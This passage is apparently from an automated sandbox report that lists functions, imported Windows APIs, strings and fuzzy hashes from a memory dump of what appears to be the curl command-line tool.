free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E7F9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E80E
freeaddrinfo.WS2_32 ref: 00007FF7F8D2E828
WSASetLastError.WS2_32 ref: 00007FF7F8D2E84A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freemalloc$ErrorLastfreeaddrinfogetaddrinfo
String ID:
API String ID: 3538824436-0
Opcode ID: 97cb612b4ed4e4bdb1a7679e12261598b6d6c75cf2e9ba34a52052d188baaf1a
Instruction ID: cffa5b5153fb9a496dd0f037249b725e18287a34453cf6c99be897e7ade31987
Opcode Fuzzy Hash: 97cb612b4ed4e4bdb1a7679e12261598b6d6c75cf2e9ba34a52052d188baaf1a
Instruction Fuzzy Hash: E6514332A09A4586E724AF11F454739E7A0FF9CB50F894439CE6E07791DF3CE449A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D015C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01630
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01643
isalpha.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D016E6

Strings

Content-disposition:, xrefs: 00007FF7F8D01666
http://, xrefs: 00007FF7F8D016AD
https://, xrefs: 00007FF7F8D016C4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fflushfwriteisalpha
String ID: Content-disposition:$http://$https://
API String ID: 3958272343-471093890
Opcode ID: 78faf66d212443e9ef9645a7fd944fb288f17e4c5b2b2dbb37cde66616ce571c
Instruction ID: f27b4574567029997380dd42dc03cdd8f460e80105a3f46e134d8cefd8a0eaa6
Opcode Fuzzy Hash: 78faf66d212443e9ef9645a7fd944fb288f17e4c5b2b2dbb37cde66616ce571c
Instruction Fuzzy Hash: 62418421B0964682EF12AB12D800179E798BF59B84FCC4035DE7C472D9DF3CE889E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D02E30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D02E68
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D02E7A
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D02FEE

Strings

%s, xrefs: 00007FF7F8D02EE7, 00007FF7F8D02F2A, 00007FF7F8D02F6A, 00007FF7F8D02F9D
Failed to open %s to write libcurl code!, xrefs: 00007FF7F8D02E8E
%s, xrefs: 00007FF7F8D02EB8, 00007FF7F8D02FCB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: %s$%s$Failed to open %s to write libcurl code!
API String ID: 4110152555-3591596397
Opcode ID: 0c055616ff5bad057d112f1962a3552dcce06adcdc3fea4f316fba2efeab3a3e
Instruction ID: 3a7fb7bdaaf416fa7553990fc8fc49d1e5d44dd114729b8a5d4b5d231f47d182
Opcode Fuzzy Hash: 0c055616ff5bad057d112f1962a3552dcce06adcdc3fea4f316fba2efeab3a3e
Instruction Fuzzy Hash: 57514020A0EB4280EB16AB069500274EB61AF0DBD0FD85036DA7D577DDDF2CF419A3E8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D01424 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 108COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D014CA
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01579

Strings

, xrefs: 00007FF7F8D014C3
%s%s, %zd bytes (0x%zx), xrefs: 00007FF7F8D0145A
%04zx: , xrefs: 00007FF7F8D01485
%02x , xrefs: 00007FF7F8D014B2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fputcfputs
String ID: $%02x $%04zx: $%s%s, %zd bytes (0x%zx)
API String ID: 269475090-3384027209
Opcode ID: 410ad1dfac7e93bc3d0b9de678087d408dd8948ebc9afe258f01ce138cee483f
Instruction ID: 14306cdd252bbafdaf90df4ebec2e13a18c81a331a805b74fec0493e10998296
Opcode Fuzzy Hash: 410ad1dfac7e93bc3d0b9de678087d408dd8948ebc9afe258f01ce138cee483f
Instruction Fuzzy Hash: DB41A422F0C68186EF10EB15D448169F7A5EF48B84FD80535CA7E476D8DE7CE049D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0BC8C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0BCC1
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0BCD8
isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0BCF4
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0BDA1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BDB8

Strings

unrecognized protocol '%s', xrefs: 00007FF7F8D0BD89

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strtok$_strdupfreeisalnum
String ID: unrecognized protocol '%s'
API String ID: 2813575802-1936080967
Opcode ID: 67d0102a0e3b0f6dbd495e02c5a3694c7223bf18767f8e3fdf05912b1382a1e1
Instruction ID: b724514ca35ad6a1eac46fb9430698985b2a8c81a237657843b7e95433f1148b
Opcode Fuzzy Hash: 67d0102a0e3b0f6dbd495e02c5a3694c7223bf18767f8e3fdf05912b1382a1e1
Instruction Fuzzy Hash: 3041A521A0E74B81FB24BB55945427DE7A0EF0CB90F844435CA7F473D8EE6CE449A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1138C Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 95stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D113E3
strchr.LIBVCRUNTIME ref: 00007FF7F8D113F3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D11425
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D11442

Part of subcall function 00007FF7F8D112D4: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D11376

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1149A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D114AF

Strings

; filename="%s", xrefs: 00007FF7F8D11473

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strchr$malloc
String ID: ; filename="%s"
API String ID: 1078366276-4174338374
Opcode ID: 403233f41d61eaf784b9ff969699071a485a43f1c8a6328fa7737f2f87504350
Instruction ID: 7baa35e2db00f3b3e84ff1ef5fead5bcf23a96e068407b05fa6b141f610e3d43
Opcode Fuzzy Hash: 403233f41d61eaf784b9ff969699071a485a43f1c8a6328fa7737f2f87504350
Instruction Fuzzy Hash: FE31A320A0DA8685FF15AF32B850278E754AF5DFA0F981071CE6E077D1DE3CE4469398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0CE5C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CF37

Part of subcall function 00007FF7F8D0C748: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0D189), ref: 00007FF7F8D0C778

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CF9F

Strings

slist%d = curl_slist_append(slist%d, "%s");, xrefs: 00007FF7F8D0CF58
struct curl_slist *slist%d;, xrefs: 00007FF7F8D0CEB0
slist%d = NULL;, xrefs: 00007FF7F8D0CEDB, 00007FF7F8D0CF1B
curl_easy_setopt(hnd, %s, slist%d);, xrefs: 00007FF7F8D0CF7D
curl_slist_free_all(slist%d);, xrefs: 00007FF7F8D0CEFB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: curl_easy_setopt(hnd, %s, slist%d);$curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
API String ID: 2190258309-2550099798
Opcode ID: 67361683f15b096f26ab7b9e974f2b4e8e7efce6597fa53389a5e3baed8a6741
Instruction ID: 81c827980d8023ac7b27809526645861d59c0b6563d32dfd16af98c7fc831344
Opcode Fuzzy Hash: 67361683f15b096f26ab7b9e974f2b4e8e7efce6597fa53389a5e3baed8a6741
Instruction Fuzzy Hash: D6317121A09A4395EB51BB26A840074FB90EF48BD0F840036D93D877D9EF7CE549A7AC

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0CA64 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D0CADC
__swprintf_l.LIBCMT ref: 00007FF7F8D0CB5F

Strings

curl_easy_setopt(hnd, %s, , xrefs: 00007FF7F8D0CAD0
%*s, xrefs: 00007FF7F8D0CB4E
%s%luUL);, xrefs: 00007FF7F8D0CB7E
%s(long)%s%s, xrefs: 00007FF7F8D0CB04

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: %*s$%s%luUL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
API String ID: 1488884202-843713100
Opcode ID: 98a00c7f28046c9180e727e7bd7eb3116134e3d245f4b1265851df0539b221b3
Instruction ID: 0ceac66c82c21c8765e7aea53c06931e05b0468ce7472d4515ac2ffb37f45fc4
Opcode Fuzzy Hash: 98a00c7f28046c9180e727e7bd7eb3116134e3d245f4b1265851df0539b221b3
Instruction Fuzzy Hash: E1314F22A08A4695EB60AB15E4407E5F3A0FF88794F840236D97D837D9EF3CD50DA798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D192DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19357
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19374
_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19389
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D193CD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D193DD

Strings

%s:%d, xrefs: 00007FF7F8D19303

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_time64calloctolower
String ID: %s:%d
API String ID: 3688332945-1029262843
Opcode ID: 44cbc58830acfad1dd0b70e10c90e09b98beddcef04e1bd801bd1cb696083cd9
Instruction ID: 0aa58663e3823616c6771df12a631551ae1d9bc41c72e42a6073ab69eec1ab3d
Opcode Fuzzy Hash: 44cbc58830acfad1dd0b70e10c90e09b98beddcef04e1bd801bd1cb696083cd9
Instruction Fuzzy Hash: 21315C21A09A4695FB14AB22B81437DE260AF5CFE8FC80130CE2D077D5DE3CE449A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D06FB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F8D06FF0
strchr.LIBVCRUNTIME ref: 00007FF7F8D07026
ExpandEnvironmentStringsA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F8D07041
strchr.LIBVCRUNTIME ref: 00007FF7F8D0705A
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0707B

Strings

_curlrc, xrefs: 00007FF7F8D06FC4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: Environmentstrchr$ExpandStringsVariable_strdup
String ID: _curlrc
API String ID: 69599419-3203016110
Opcode ID: 608b491f90a0c22c2589febf15ce6a3d171594e44850901141dcb248629e5063
Instruction ID: 4155fbc82647d1a38797e19efb1126a727bfaf825cde070ab7e90d7d02f011de
Opcode Fuzzy Hash: 608b491f90a0c22c2589febf15ce6a3d171594e44850901141dcb248629e5063
Instruction Fuzzy Hash: 2B21A122708A4185EB30AB11E4406EAE3A0FF8CB84FD94131DE9D46799CE3DD54ADB94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D23660 Relevance: 10.6, APIs: 7, Instructions: 56networkCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D2369A

Part of subcall function 00007FF7F8D2E694: getaddrinfo.WS2_32 ref: 00007FF7F8D2E6BF
Part of subcall function 00007FF7F8D2E694: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E730
Part of subcall function 00007FF7F8D2E694: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E77A
Part of subcall function 00007FF7F8D2E694: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E7F9
Part of subcall function 00007FF7F8D2E694: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2E80E

WSAGetLastError.WS2_32 ref: 00007FF7F8D236BB
WSAGetLastError.WS2_32 ref: 00007FF7F8D236C5
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F8D236DD
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F8D236EC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2370D
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F8D23718

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: CriticalSectionfree$ErrorLastLeavemalloc$Enter__swprintf_lgetaddrinfo
String ID:
API String ID: 2209146687-0
Opcode ID: e804c5892e852256f26f8f7b697d15e91e23ab534e6b64dbb959041b5d2ca9ea
Instruction ID: 85f52a823f46279f0b513b71f51b72d8c45c55c7c706d0e3cc5267bd89f8579e
Opcode Fuzzy Hash: e804c5892e852256f26f8f7b697d15e91e23ab534e6b64dbb959041b5d2ca9ea
Instruction Fuzzy Hash: E321447260CA4682EB40AF65E450269E3A0FF9CF84F980071DA5D477A5CF3CD449DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D35158 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 54COMMON

Download Yara Rule

Strings

LIST, xrefs: 00007FF7F8D351D4
PRET STOR %s, xrefs: 00007FF7F8D35216
PRET %s, xrefs: 00007FF7F8D351E6
NLST, xrefs: 00007FF7F8D351CD
PRET RETR %s, xrefs: 00007FF7F8D3521F

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: LIST$NLST$PRET %s$PRET RETR %s$PRET STOR %s
API String ID: 0-294979158
Opcode ID: 53b311989eec88c0f9a3a0eac77fb988d3c2a94b4657893af2c266291509e556
Instruction ID: 96f8cd5dbdb80dd45761904ae503ecb6319a58d720f158d06dff62b23d86688c
Opcode Fuzzy Hash: 53b311989eec88c0f9a3a0eac77fb988d3c2a94b4657893af2c266291509e556
Instruction Fuzzy Hash: 90219251D4968B80FB55AB55D8443F5E3A09F49B88FD80036C92C4A2D1DF2CA58DF7B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2CC9C Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 53stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2CCCA
strchr.LIBVCRUNTIME ref: 00007FF7F8D2CCDA
strchr.LIBVCRUNTIME ref: 00007FF7F8D2CCF9
strchr.LIBVCRUNTIME ref: 00007FF7F8D2CD0F

Strings

The requested URL returned error: %s, xrefs: 00007FF7F8D2CD22
HTTP, xrefs: 00007FF7F8D2CCB7
The requested URL returned error: %d, xrefs: 00007FF7F8D2CD3D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$strncmp
String ID: HTTP$The requested URL returned error: %d$The requested URL returned error: %s
API String ID: 2197385779-4174864708
Opcode ID: 28be844faac41f93b42d4d9ebf2027b6e2f1c6e48e40b611091809c762441dbc
Instruction ID: 4edfdeac653a5ea01f37181da8e9e3d18b7363252a44667457b249f529c2bccb
Opcode Fuzzy Hash: 28be844faac41f93b42d4d9ebf2027b6e2f1c6e48e40b611091809c762441dbc
Instruction Fuzzy Hash: 4F118725A0D74241FB25AB16B4402B8EB50AF8DBC0FDC4570DB5D0B7C5DE2CE4499BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1317E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 00007FF7F8D1317E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_WRONG_CREDENTIAL_HANDLE
API String ID: 2544740495-3592922199
Opcode ID: 5e82f5a7df321d80000e6c514240b7b0788326fdaf1570e469f5a550412ce8d8
Instruction ID: bd7bb307fd1608a54eb5388468a9c2999c73ade4aaf74f135b14ad06748fd14b
Opcode Fuzzy Hash: 5e82f5a7df321d80000e6c514240b7b0788326fdaf1570e469f5a550412ce8d8
Instruction Fuzzy Hash: 9501FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1318A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_WRONG_PRINCIPAL, xrefs: 00007FF7F8D1318A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_WRONG_PRINCIPAL
API String ID: 2544740495-1567375120
Opcode ID: 71b5bd0bd2c4ab393c8ec79bf7120c6e552326132cc97a442f3191a6bacb258b
